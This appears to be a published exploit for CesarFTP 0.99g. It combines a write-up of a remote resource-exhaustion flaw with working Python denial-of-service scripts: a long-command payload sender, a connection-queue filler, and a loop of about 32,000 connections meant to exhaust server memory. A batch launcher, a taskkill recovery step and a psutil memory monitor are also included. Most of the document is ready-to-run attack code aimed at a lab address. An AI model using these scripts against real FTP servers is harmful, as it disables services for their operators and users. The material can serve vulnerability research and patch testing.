# Exploit Title: CesarFTP 0.99g Remote Resource Exhaustion Vulnerability v4260
# Date: 10/16/2015
# Exploit Author: @decidedlygray (independently discovered while learning Sulley fuzzing framework)
# Vendor Homepage: ACLogic.com [NO LONGER EXISTS]
# Software Link: http://download.cnet.com/CesarFTP/3000-2160_4-13481.html
# Version: 0.99g
# Tested on: Windows XP, Windows 7
#
# Exploit for the issue already discovered in 2004:
# - CesarFTP Server Long Command Denial of Service Exploit - https://www.exploit-db.com/exploits/428/
# - ACLogic CesarFTP 0.99 - Remote Resource Exhaustion Vulnerability - https://www.exploit-db.com/exploits/23700/
#
# Details:
#
# This is a remote resource exhaustion / denial of service (DoS) vulnerability.
#
# By sending an overly long command, it is possible to cause Server.exe (a
# subprocess of CesarFTP.exe) to enter an infinite loop and peg CPU usage at 99%.
#
# ftp_user = 'USER '+'/\\'*32764 ##MAX SIZE ALLOWED
# ftp_user = 'USER '+'/\\'*2045 ##MIN SIZE TO CAUSE CPU USAGE ISSUE
# ftp_user = 'A'*4095 ##MIN SIZE TO CAUSE RESOURCE ISSUE
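#
# For reference, the payload lengths above work out as follows: both "minimum"
# payloads are 4095 bytes before the trailing CRLF, and the maximum accepted
# payload is 65533 bytes (65535 including the CRLF), which suggests a limit of
# just under 64K per command line. A quick check in a Python shell:
#
#   >>> len('USER ' + '/\\'*32764)   # max size allowed
#   65533
#   >>> len('USER ' + '/\\'*2045)    # min size to cause the CPU usage issue
#   4095
#   >>> len('A'*4095)                # min size to cause the resource issue
#   4095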
#
# It appears that opening 3 of these connections fills the server's connection
# queue, which is never released until the clients choose to close their
# connections. Additional TCP connections can still be opened to the server, but
# because the FTP connection queue is full they just sit there, unable to
# authenticate with the FTP server. (A single-process sketch of this queue-filling
# step is included after the script below.)
#
# Every additional connection attempt appears to open a socket that is never
# closed on the server side, even if the client disconnects. These additional
# connections (made after the initial 3 DoS/locking connections) appear in
# CesarFTP's running connection log and are not cleared until the 3 DoS
# connections are closed.
#
# Each additional connection consumes memory in the Server.exe process that is
# not freed until the 3 DoS connections are closed. Server.exe appears to allocate
# an additional 4K of process memory per additional connection, and some additional
# memory is also allocated in the CesarFTP.exe process. (A psutil-based memory
# monitor is sketched at the end of this gist.)
#
# Post-exploitation notes: even if the client sends the long USER command and then
# disconnects, Server.exe stays stuck in its 99% CPU loop. On Windows XP, even if
# CesarFTP.exe is closed, Server.exe continues to run at 99% CPU and must be killed
# manually, e.g. through Task Manager (or taskkill; see the snippet after the .bat
# below).
#!/usr/bin/python
import socket

def do_connect():
    # ftp_user = 'USER '+'/\\'*2045   ##MIN SIZE TO CAUSE RESOURCE ISSUE
    # ftp_user = 'USER '+'/\\'*32764  ##MAX SIZE ALLOWED BEFORE INPUT IS REJECTED
    # print 'USER is going to be:\n'+ftp_user
    # USER command is irrelevant
    ftp_user = 'A'*4095  ##MIN SIZE TO CAUSE RESOURCE ISSUE
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        print 'Connecting'
        s.connect(('192.168.56.104', 21))
        data = s.recv(1024)
        print data
        print '\nSending long username...'
        s.send(ftp_user + '\r\n')
        data = s.recv(1024)
        print data
        # Execution never actually makes it here...
        s.send('PASS superfuzzy\r\n')
        data = s.recv(1024)
        print data
        s.close()
        print 'fin.'
    except:
        print 'Oops! Something broke :('
        s.close()

if __name__ == '__main__':
    do_connect()
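
A minimal single-process sketch of the queue-filling step described in the header, assuming the same target address and payload size as the script above: it opens 3 oversized connections and simply holds them open until interrupted, instead of launching cesar_remoteDOS.py three times via the .bat below.

#!/usr/bin/python
# Sketch: hold 3 oversized connections open to fill the CesarFTP connection queue.
# Target address and payload size are assumed to match cesar_remoteDOS.py above.
import socket
import time

def hold_connections(host='192.168.56.104', port=21, count=3):
    held = []
    for i in range(count):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((host, port))
        print '[%d] banner: %r' % (i, s.recv(1024))
        s.send('A'*4095 + '\r\n')  # min size to cause the resource issue
        held.append(s)             # keep the socket open to hold a queue slot
    print 'Holding %d connections; press Ctrl+C to release them.' % len(held)
    try:
        while True:
            time.sleep(60)
    except KeyboardInterrupt:
        for s in held:
            s.close()

if __name__ == '__main__':
    hold_connections()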
cd %~dp0
start python cesar_remoteDOS.py
start python cesar_remoteDOS.py
start python cesar_remoteDOS.py
REM this one (and all subsequent) will hang because the queue is full
start python cesar_remoteDOS.py
pause
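
If the target needs to be recovered after testing, the stuck Server.exe described in the header can also be killed from the command line instead of Task Manager (taskkill ships with Windows XP Professional and later; on editions without it, Task Manager remains the fallback):

REM recover the target: force-kill the stuck CesarFTP processes
taskkill /F /IM Server.exe
taskkill /F /IM CesarFTP.exe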
#!/usr/bin/python
"""
CesarFTP 0.99g Remote Resource Exhaustion Vulnerability
@decidedlygray 10/16/2015

CesarFTP memory exhaustion script.
Each new connection attempt uses an additional ~4K of memory;
512,000K = 512MB, so roughly 128,000 attempts should fill 512MB of memory.

Run this after cesar_remoteDOS.run.bat has filled up the connection queue. This
script will then exhaust the memory of the target (the CPU is already pegged).
"""
import socket
import select
import time

def do_connect():
    total_connections = 128000/4  # split across 4 manually-launched copies of this script for a faster takedown
    for i in range(1, total_connections):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setblocking(0)
        s.settimeout(0.25)  # settimeout() overrides setblocking(0) and puts the socket back in timeout mode
        try:
            print '['+str(i)+'/'+str(total_connections)+'] Connecting'
            s.connect(('192.168.56.104', 21))
            # timeout_in_seconds = 1
            # ready = select.select([s], [], [], timeout_in_seconds)
            # if ready[0]:
            #     data = s.recv(4096)
            data = s.recv(1024)
            print data
            print '['+str(i)+'] Sending large data buffer...'
            # ftp_user = 'USER '+'/\\'*32764  ##MAX SIZE ALLOWED
            # note: doesn't need the USER command, any data will do
            ftp_user = 'A'*4095  ##MIN SIZE TO CAUSE RESOURCE ISSUE
            s.send(ftp_user+'\r\n')
            data = s.recv(1024)  # times out here
            print data
            # Execution never makes it here
            print '['+str(i)+'] Sending password...'
            s.send('PASS test\r\n')
            data = s.recv(1024)
            print data
            s.close()
        except:
            print '['+str(i)+'/'+str(total_connections)+'] Could not connect to FTP!'
            s.close()

if __name__ == '__main__':
    do_connect()
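
To observe the roughly 4K-per-connection memory growth described in the header, the following helper watches Server.exe's memory usage while the exhaustion script runs. It is only a monitoring sketch and assumes the psutil package is installed on the Windows target.

#!/usr/bin/python
# Monitoring sketch: print Server.exe memory usage every few seconds while the
# exhaustion script runs. Assumes the psutil package is installed on the target.
import time
import psutil

def watch(process_name='Server.exe', interval=5):
    while True:
        for p in psutil.process_iter():
            try:
                if p.name().lower() == process_name.lower():
                    rss_kb = p.memory_info().rss / 1024
                    print '%s pid=%d rss=%dK' % (process_name, p.pid, rss_kb)
            except (psutil.NoSuchProcess, psutil.AccessDenied):
                pass
        time.sleep(interval)

if __name__ == '__main__':
    watch()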